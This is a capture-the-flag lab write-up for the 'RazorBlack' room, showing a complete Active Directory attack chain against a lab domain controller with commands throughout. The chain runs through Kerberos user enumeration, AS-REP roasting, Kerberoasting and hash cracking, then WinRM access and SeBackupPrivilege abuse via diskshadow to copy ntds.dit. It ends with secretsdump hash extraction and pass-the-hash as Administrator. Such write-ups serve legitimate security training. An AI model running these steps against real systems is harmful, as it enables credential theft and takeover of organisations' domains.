# RazorBlack {% hint style="info" %} This write up does not cover individual flags for the room. This write up is treated as a boot to root from external to domain administrator access. {% endhint %} ## Nmap ``` sudo nmap 10.10.150.205 -p- -sS -sV PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-13 10:02:50Z) 111/tcp open rpcbind 2-4 (RPC #100000) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 2049/tcp open mountd 1-3 (RPC #100005) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49673/tcp open msrpc Microsoft Windows RPC 49674/tcp open msrpc Microsoft Windows RPC 49678/tcp open msrpc Microsoft Windows RPC 49693/tcp open msrpc Microsoft Windows RPC 49707/tcp open msrpc Microsoft Windows RPC Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows ``` ### Kerberos user enumeration Hitting kerberos first we perform user enumeration making use of `kerbrute`. ``` kerbrute userenum '/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt' --dc '10.10.35.255' --domain 'raz0rblack.thm' ``` After a short while we obtain a couple of usernames. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FKB1scCVuMmjWOhcxPRGN%2Fimage.png?alt=media\&token=b771e9e7-035c-48c7-a184-8f35078fc1b4) ### No Pre-Authentication With a coupe of known usernames we run them with Impacket's `GetNPUsers.py` . The user *twilliams* we find has [No Pre-Authentication](https://ldapwiki.com/wiki/Kerberos%20Pre-Authentication) enabled in Active Directory. ``` GetNPUsers.py 'raz0rblack.thm'/'twilliams': -request -dc-ip '10.10.146.253' -format 'john' -no-pass ``` As such, we are able to pull the `krb5asrep` hash from the user account which can next be used against `John` for cracking. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FxfKZ7ns4VisoUgDut0ga%2Fimage.png?alt=media\&token=0465f639-29d3-467a-ac6c-3102369827aa) ### Hash Cracking #1 A few minutes of cracking against the `rockyou.tx`t word list we soon reveal the plain text password. ``` sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F8QS9Q2V14ejls6QhFFJG%2F2022-08-13_06-56_1.png?alt=media\&token=22c07e26-5b19-4cdc-9885-1913e1d152c2) ### Service Prinicpal Names With a set of valid credentials we find we are unable to proceed with SMB. Using the same credentials to check for Service Principla Names using Impacket's G`etUserSPNs.py` we are able to pull a hash for the user *xyan1d3*. ``` GetUserSPNs.py raz0rblack.thm/twilliams:'' -dc-ip '10.10.146.253' -request ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FHOw3RTjWdKRfPxPEjFDO%2Fimage.png?alt=media\&token=2bab0c56-6fb6-482c-ac2e-d6a4f85a58e3) ### Hash Cracking #2 Taking the `krb5tgs` hash we are able to again crack with `John` and the `rockyou.txt` list. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fcrcsfk2QGW7L8NqPOlYm%2F2022-08-13_06-55.png?alt=media\&token=fafa6c29-05d9-493f-9ab7-dfb6a74f9785) ### WinRM With another valid set of credentials we find we are able to login via `WinRM` for remote access using [Evil-WinRM](https://github.com/Hackplayers/evil-winrm). ``` evil-winrm -i '10.10.35.255' -u 'xyan1d3' -p '' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Frkgiim7e4YbOnwkP0bi3%2Fimage.png?alt=media\&token=b1f7959b-8e2b-4e94-a189-88ecabbb14f1) ### SeBackupPrivilege Performing basic enumeration steps we find our current user is a member of the "Backup Operators" group and have privileges for **SeBackupPrivilege**. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fl5vFxOT5pUdgQs5wQ53Y%2Fimage.png?alt=media\&token=862e9840-203f-4199-b4c5-5743c3174254) {% content-ref url="../linux/fusion-corp" %} [fusion-corp](https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/fusion-corp) {% endcontent-ref %} This privilege grants us the ability to create backups of files on the system. Knowing this, a high value file would be the `ntds.dit` file which is a database of hashes for domain objects / users. As the `ntds.dit` file is in constant use we will be unable to create a backup using normal methods as the system will lock the file. What we can do instead is create a Distributed Shell File (DSH). This file will contain the appropriate commands for us to run the `diskshadow` utility against the C: drive and ultimately the *`ntds.dit`* file. First created a file called `viper.dsh` on the attacking machine. Then insert the following contents: ``` set context persistent nowriters add volume c: alias viper create expose %viper% x: ``` Once completed use the command `unix2dos` to convert the file to DOS format. ``` unix2dos viper.dsh ``` Then on the target system create a directory called 'temp' in `c:\temp.` After this upload the `viper.dsh` file. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FjPLe2HyBIBUROOe1nlgp%2Fimage.png?alt=media\&token=6e8e9fdb-1a52-48f9-9260-08b4eb3089af) Then execute `diskshadow` against the file. ``` diskshadow /s viper.dsh ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDbtNv2sXINUtKJyz5kzW%2Fimage.png?alt=media\&token=850741ef-5d5f-46c5-b663-eb7d3e9448ae) After creating the shadow copy we can then use `robocopy` to copy the `ntds` database to our current working directory. ``` robocopy /b x:\windows\ntds . ntds.dit ``` From here we need to extract the SYSTEM hive which will be required for extracting the hashes with Impacket later. ``` reg save hklm\system c:\Temp\system ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FOifC7IcVSDLAXp723hhk%2Fimage.png?alt=media\&token=3232c640-1936-49fa-8d51-381d48b0e552) After the registry hives have been saved we can download to our attacking machine. ``` download ntds.dit download system ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FEMyIcLpX4HEoQG5RPSbv%2Fimage.png?alt=media\&token=c1be0d01-23b5-4db6-a02a-ae2e6bc1763a) Back on the attacking machine use the following command with Impacket's `secretsdump.py` to extract the hashes from `ntds.dit`. ``` secretsdump.py -ntds ntds.dit -system system local ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FiVJCSoat82xrEYqZQCwr%2Fimage.png?alt=media\&token=06bbc144-63cc-4e43-9c1e-012703b66514) ### WinRM (Administrator) With the Administrators hash we can utilize `Evil-WinRm` again to login as the Domain Administrator. ``` evil-winrm -i '10.10.95.150' -u 'administrator' -H '' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FG6rSTIGEOHyOKF8l6ALS%2Fimage.png?alt=media\&token=07c63a53-822f-4f06-ad27-36334b4e3c93)